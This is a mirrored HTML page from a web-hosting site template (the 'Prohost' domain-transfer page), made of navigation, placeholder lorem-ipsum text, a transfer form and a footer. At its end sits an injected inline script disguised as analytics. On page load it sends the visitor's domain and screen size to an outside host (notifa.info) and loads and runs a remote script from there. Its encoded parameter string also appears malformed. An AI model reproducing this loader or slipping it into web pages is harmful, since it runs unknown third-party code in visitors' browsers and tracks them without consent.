<!DOCTYPE html>
<html lang="en">

<!-- Mirrored from rctheme.com/demo-html/prohost/transfer-domain.html by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 17 Sep 2018 17:00:25 GMT -->
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">

<!-- Mobile Meta -->
<meta name="viewport" content="width=device-width, initial-scale=1">

<!-- The above 3 meta tags *must* come first in the head; any other head content must come *after* these tags -->
<meta name="description" content="">
<meta name="author" content="">
<title>Domain Name Transfer</title>

<!-- Favicon -->
<link rel="icon" href="images/favicon.png">

<!-- Bootstrap core CSS -->
<link href="css/bootstrap.css" rel="stylesheet" media="all" />

<!-- Font Awesome CSS -->
<link rel="stylesheet" href="css/font-awesome.css" media="all" />

<!-- Main Template CSS -->
<link rel="stylesheet" href="css/style.css" media="all" />

<!-- Animation CSS -->
<link rel="stylesheet" href="css/animate.min.css" media="all" />
</head>

<body>
<!-- ========= Header Section Start ========= -->

<header>
  <div class="top_header">
    <div class="container">
      <div class="row">
        <div class="col-md-6 col-sm-6 col-xs-12">
          <div class="top_link">
            <ul>
              <li>24x7 Live support</li>
              <li>+ 91 123 4567 890</li>
            </ul>
          </div>
        </div>
        <div class="col-md-6 col-sm-6 col-xs-12">
          <div class="top_link right">
            <ul>
              <li><a href="about-us.html">About Us</a></li>
              <li><a href="offers.html">Offers</a></li>
              <li><a href="contact-us.html">Contact Us</a></li>
              <li><a href="login.html">Login</a></li>
            </ul>
          </div>
        </div>
      </div>
    </div>
  </div>
  <div class="main_menu">
    <div class="container">
      <div class="row">
        <div class="col-md-3 col-sm-3 col-xs-12">
          <div class="logo"><a href="index-2.html"><img src="images/logo.png" alt="logo" title="logo" /></a></div>
        </div>
        <div class="col-md-9 col-sm-9 col-xs-12">
          <div class="navbar navbar-default" role="navigation">
            <div class="navbar-header">
              <button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse"> <span class="sronly">Menu</span> <i class="fa fa-bars" aria-hidden="true"></i></button>
            </div>
            <nav class="navbar navbar-default">
              <div id="navbar-collapse-1" class="collapse navbar-collapse">
                <ul class="nav navbar-nav">
                  <li><a href="index-2.html">Home</a></li>
                  <li class="active"><a href="#">Domain <b class="caret"></b></a>
                    <ul class="wm-dropdown-menu">
                      <li><a href="register-domain.html">Register a Domain</a></li>
                      <li><a href="transfer-domain.html">Transfer Your Domain</a></li>
                      <li><a href="domain-price.html">Domain Price</a></li>
                      <li><a href="domain-promos.html">Domain Promos</a></li>
                    </ul>
                  </li>
                  <li><a href="#">Hosting <b class="caret"></b></a>
                    <ul class="wm-dropdown-menu">
                      <li><a href="shared-hosting.html">Shared Hosting</a></li>
                      <li><a href="reseller-hosting.html">Reseller Hosting</a></li>
                      <li><a href="dedicated-servers.html">Dedicated Servers</a></li>
                      <li><a href="vps.html">VPS Servers</a></li>
                      <li><a href="cloud-hosting.html">Cloud Hosting</a></li>
                      <li><a href="wordpress-hosting.html">Wordpress Hosting</a></li>
                    </ul>
                  </li>
                  <li><a href="#">Email <b class="caret"></b></a>
                    <ul class="wm-dropdown-menu">
                      <li><a href="business-email.html">Business Email</a></li>
                      <li><a href="cloud-business-email.html">Cloud Business Email</a></li>
                      <li><a href="microsoft-office-365.html">Microsoft Office 365</a></li>
                      <li><a href="google-apps.html">Google Apps</a></li>
                    </ul>
                  </li>
                  <li><a href="#">Security <b class="caret"></b></a>
                    <ul class="wm-dropdown-menu">
                      <li><a href="ssl-security.html">SSL Security</a></li>
                      <li><a href="codeguard.html">Codeguard</a></li>
                    </ul>
                  </li>
                  <li><a href="bundled-offers.html">Bundle Offers</a></li>
                  <li><a href="support.html">Support</a></li>
                </ul>
              </div>
            </nav>
          </div>
        </div>
      </div>
    </div>
  </div>
</header>

<!-- ========= Header Section End ========= --> 

<!-- ========= Inner Page Banner Section Start ========= -->

<section class="inner_page_header">
  <div class="container">
    <div class="row">
      <div class="col-md-12">
        <div class="inner_headin_s"><i class="fa fa-transgender-alt"></i>
          <h1>Transfer a Domain</h1>
          <p>Lorem ipsum dolor sit amet sit et justo consectetuer adipiscing elit. Suspendisse et justo Praesent mattis.Lorem ipsum dolor sit amet sit et justo consectetuer adipiscing elit uspendisse et justo.</p>
          <div class="tranfer_domain">
            <form>
              <input type="text" class="tranfer_text" placeholder="Enter Your Domain Name" />
              <select class="tranfer_s">
                <option>.com</option>
                <option>.co.uk</option>
                <option>.in</option>
                <option>.net</option>
                <option>.org</option>
              </select>
              <input type="button" class="tranfer_domain_btn primary_button" value="Transfer" />
            </form>
          </div>
        </div>
      </div>
    </div>
  </div>
</section>

<!-- ========= Inner Page Banner Section End ========= --> 

<!-- ========= Why Register Section Start ========= -->

<section class="why_register text_center">
  <div class="container">
    <div class="col-md-12 col-sm-12 col-xs-12">
      <div class="headings black_text">
        <h6>move your domain</h6>
        <h3>Transfer in three easy steps!</h3>
        <div class="sep black_bg"></div>
      </div>
    </div>
    <div class="register_choose_section">
      <div class="row">
        <div class="col-md-4 col-sm-4 col-xs-12 wow fadeInLeft" data-wow-duration=".3" data-wow-delay=".1s">
          <div class="choose_r_options"><i class="fa fa-envelope gradient_color"></i>
            <h5 class="section_sub_heading">Check domain eligibility</h5>
            <p>There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form, by injected humour.</p>
          </div>
        </div>
        <div class="col-md-4 col-sm-4 col-xs-12 wow fadeInLeft" data-wow-duration=".3" data-wow-delay=".3s">
          <div class="choose_r_options"><i class="fa fa-lock gradient_color"></i>
            <h5 class="section_sub_heading">Prepare transfer</h5>
            <p>There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form, by injected humour.</p>
          </div>
        </div>
        <div class="col-md-4 col-sm-4 col-xs-12 wow fadeInLeft" data-wow-duration=".3" data-wow-delay=".5s">
          <div class="choose_r_options"><i class="fa fa-server gradient_color"></i>
            <h5 class="section_sub_heading">Submit and confirm</h5>
            <p>There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form, by injected humour.</p>
          </div>
        </div>
      </div>
    </div>
  </div>
</section>

<!-- ========= Why Register Section End ========= --> 

<!-- ========= Web Hosting Features Section Start ========= -->

<section class="hosting_features">
  <div class="container">
    <div class="row">
      <div class="col-md-12 col-sm-12 col-xs-12">
        <div class="headings white_text">
          <h6>millions of customers</h6>
          <h3>Why choose Prohost</h3>
          <div class="sep white_bg"></div>
        </div>
      </div>
      <div class="features_box">
        <div class="col-md-6 col-sm-12 col-xs-12 wow fadeInLeft" data-wow-duration=".3" data-wow-delay=".1s">
          <div class="features_boxs">
            <div class="features_imagev"><i class="fa fa-tasks"></i></div>
            <div class="features_content">
              <h5 class="section_sub_heading">30% cheaper renewals</h5>
              <p>Duis posuere blandit orci sed tincidunt. Curabitur porttitor nisi ac nunc ornare, in fringilla nisl blandit.</p>
            </div>
          </div>
        </div>
        <div class="col-md-6 col-sm-12 col-xs-12 wow fadeInRight" data-wow-duration=".3" data-wow-delay=".2s">
          <div class="features_boxs">
            <div class="features_imagev"><i class="fa fa-life-ring"></i></div>
            <div class="features_content">
              <h5 class="section_sub_heading">Experienced staff</h5>
              <p>Duis posuere blandit orci sed tincidunt. Curabitur porttitor nisi ac nunc ornare, in fringilla nisl blandit.</p>
            </div>
          </div>
        </div>
        <div class="col-md-6 col-sm-12 col-xs-12 wow fadeInLeft" data-wow-duration=".3" data-wow-delay=".3s">
          <div class="features_boxs">
            <div class="features_imagev"><i class="fa fa-indent"></i></div>
            <div class="features_content">
              <h5 class="section_sub_heading">Free WhoisGuard</h5>
              <p>Duis posuere blandit orci sed tincidunt. Curabitur porttitor nisi ac nunc ornare, in fringilla nisl blandit.</p>
            </div>
          </div>
        </div>
        <div class="col-md-6 col-sm-12 col-xs-12 wow fadeInRight" data-wow-duration=".3" data-wow-delay=".4s">
          <div class="features_boxs">
            <div class="features_imagev"><i class="fa fa-sitemap"></i></div>
            <div class="features_content">
              <h5 class="section_sub_heading">Easy to use Control Panel</h5>
              <p>Duis posuere blandit orci sed tincidunt. Curabitur porttitor nisi ac nunc ornare, in fringilla nisl blandit.</p>
            </div>
          </div>
        </div>
      </div>
    </div>
  </div>
</section>

<!-- ========= Web Hosting Features Section End ========= --> 

<!-- ========= Personal Info Section Start ========= -->

<section class="safe_host">
  <div class="container">
    <div class="row">
      <div class="col-md-12 col-sm-12 col-xs-12">
        <div class="headings black_text">
          <h6>safe with us</h6>
          <h3>Your personal information</h3>
          <div class="sep black_bg"></div>
        </div>
      </div>
      <div class="pr_info">
        <div class="col-md-6 col-sm-6 col-xs-12">
          <div class="info_left wow zoomIn" data-wow-duration=".3" data-wow-delay=".1s"> <img src="images/computer-safe.png" alt="icon" /> </div>
        </div>
        <div class="col-md-6 col-sm-6 col-xs-12">
          <div class="info_right">
            <ul>
              <li class="wow fadeInRight" data-wow-duration=".3" data-wow-delay=".1s">Nullam turpis. Cras daibus, orci rutrum adipiscing luctus, nisl magna tempus.</li>
              <li class="wow fadeInRight" data-wow-duration=".3" data-wow-delay=".2s">Vivamus sit amet felis. Vivamus et justo in nunc pharetra semper.</li>
              <li class="wow fadeInRight" data-wow-duration=".3" data-wow-delay=".3s">Etiam enim. Suspendisse imperdiet cursus nisi. Maecenas sed nisl nec lectus.</li>
              <li class="wow fadeInRight" data-wow-duration=".3" data-wow-delay=".4s">Nullam turpis. Cras dapibus, orci rutum adipiscing luctus, nisl magna tempus.</li>
              <li class="wow fadeInRight" data-wow-duration=".3" data-wow-delay=".5s">Vivamus sit amet felis. Vivamus et justo in nunc pharetra semper.</li>
              <li class="wow fadeInRight" data-wow-duration=".3" data-wow-delay=".6s">Vivamus sit amet felis. Vivamus et justo in nunc pharetra semper.</li>
            </ul>
            <a class="primary_button" href="#">Read More</a> </div>
        </div>
      </div>
    </div>
  </div>
</section>

<!-- ========= Personal Info Section End ========= --> 

<!-- ========= Footer Section Start ========= -->

<footer class="footer">
  <div class="f_outr_section">
    <div class="container">
      <div class="row">
        <div class="col-md-3 col-sm-6 col-xs-12">
          <div class="f_txt_heading">
            <h4>About Us</h4>
            <div class="f_about">
              <p>Lorem ipsum dolor sit amet dolor sit elit Suspendisse et justo et justo sit Praesent mattis commodo augue Aliquam ornare. Lorem ipsum dolor sit amet dolor sit elit. Lorem ipsum dolor sit amet dolor sit elit.</p>
            </div>
          </div>
        </div>
        <div class="col-md-3 col-sm-6 col-xs-12">
          <div class="f_txt_heading">
            <h4>Quick Links</h4>
            <ul>
              <li><a href="about-us.html">About Us</a></li>
              <li><a href="contact-us.html">Contact Us</a></li>
              <li><a href="support.html">Support</a></li>
              <li><a href="offers.html">Offers</a></li>
              <li><a href="bundled-offers.html">Bundle Offers</a></li>
              <li><a href="login.html">Login</a></li>
              <li><a href="404.html">404 Page</a></li>
            </ul>
          </div>
        </div>
        <div class="col-md-3 col-sm-6 col-xs-12">
          <div class="f_txt_heading">
            <h4>Our Services</h4>
            <ul>
              <li><a href="shared-hosting.html">Shared Hosting</a></li>
              <li><a href="vps.html">Virtual Private Server</a></li>
              <li><a href="reseller-hosting.html">Reseller Hosting</a></li>
              <li><a href="dedicated-servers.html">Dedicated Server</a></li>
              <li><a href="ssl-security.html">SSL Certificated</a></li>
              <li><a href="cloud-hosting.html">Cloud Hosting</a></li>
              <li><a href="wordpress-hosting.html">Wordpress Hosting</a></li>
            </ul>
          </div>
        </div>
        <div class="col-md-3 col-sm-6 col-xs-12">
          <div class="f_txt_heading ">
            <h4>Contact Us</h4>
            <div class="f_contact_s">
              <div class="f-con-head">Address:-
                <p>Lorem ipsum dolor<br>
                  amet dolor sit elit Suspendisse</p>
              </div>
            </div>
            <div class="f_contact_s">
              <div class="f-con-head">Contact:-
                <p>Ph: (+000) 1234 5678<br>
                  Fax: (+000) 1234 5678</p>
              </div>
            </div>
            <div class="f_contact_s">
              <div class="f-con-head">Email:-
                <p><a href="mailto:info@yourdomain.com">info@yourdomain.com</a><br>
                  <a href="mailto:sales@yourdomain.com">sales@yourdomain.com</a></p>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>
  </div>
  <div class="footer-bottom">
    <div class="container">
      <div class="row">
        <div class="col-md-6 col-sm-6 col-xs-12">
          <div class="news_letr">
            <form>
              <input type="text" placeholder="Enter your Email" class="nwesltr">
              <input type="submit" class="secondry_button join_now" value="Join Now">
            </form>
          </div>
        </div>
        <div class="col-md-6 col-sm-6 col-xs-12">
          <div class="social">
            <ul>
              <li><a href="#"><i class="fa fa-facebook"></i></a></li>
              <li><a href="#"><i class="fa fa-google"></i></a></li>
              <li><a href="#"><i class="fa fa-twitter"></i></a></li>
              <li><a href="#"><i class="fa fa-linkedin"></i></a></li>
            </ul>
          </div>
        </div>
      </div>
    </div>
  </div>
  <div class="copy-right">
    <div class="container">
      <div class="row">
        <div class="col-md-12 col-sm-12 col-xs-12">Copyright © 2015 - 2017 prohost. All Rights Reserved.</div>
      </div>
    </div>
  </div>
</footer>

<!-- Bootstrap core JavaScript --> 
<script type="text/javascript" src="js/jquery.min.js"></script> 
<script type="text/javascript" src="js/bootstrap.min.js"></script> 

<!-- Animation JavaScript --> 
<script type="text/javascript" src="js/jquery.wow.min.js" ></script> 
<script type="text/javascript" src="js/wow.min.js" ></script> 

<!-- Custom Template JavaScript --> 
<script type="text/javascript" src="js/custom.js"></script>
<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p01.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + 4TtHaUQnUEiP6K%2fc5C582NzYpoUazw5m834VngSV4X4yH7sIxxNw0QqQNu2AlNb6UGtmxaf7%2b9ijeyKN4V23HlZUjbiLNPj6YM8F7ujDl1A4ojRln9%2bR0quzRFXfdr7cTmnRfw%2bxpMrOqdBLmGOuZHv01d1Xdp8kcvdmqzVf4ltT%2buNLxxvE4w4oZW4q%2b4XRd9d%2bFix7ahg3Tr3rsoEBOrN8uM9e8MiMgn4ADZwIHTwWUjccU2vvvMXJJN8sLyRALM1FrGA1oXCpnpp%2fb3RRlomsKJZ1uDzb4mBr28Zi5Kat1jy6O8fJqe3uNedJksvJcyt%2fxgM1hBwJgRKGFMguCF81bRK%2bcHg14Gzu3uP5vW8stpGC2B7by2FTNQHN5FTZQWY7ozDkfEHDkIc7LDrCwtD2pyVCpjcCyiJtCVYcu5JtKVN%2beykc9%2bHx%2fIlhchJ0IoSeFrKJl9u9Xw%2fhdr4Z5wPUbtZ40BzN9UL%2fxQbJmQg244z%2fDb4Y15lY9mwjK5DaKVEKBaqqceuKRIx0VBy1aOpX1zjqbQ03 + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>

<!-- Mirrored from rctheme.com/demo-html/prohost/transfer-domain.html by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 17 Sep 2018 17:00:25 GMT -->
</html>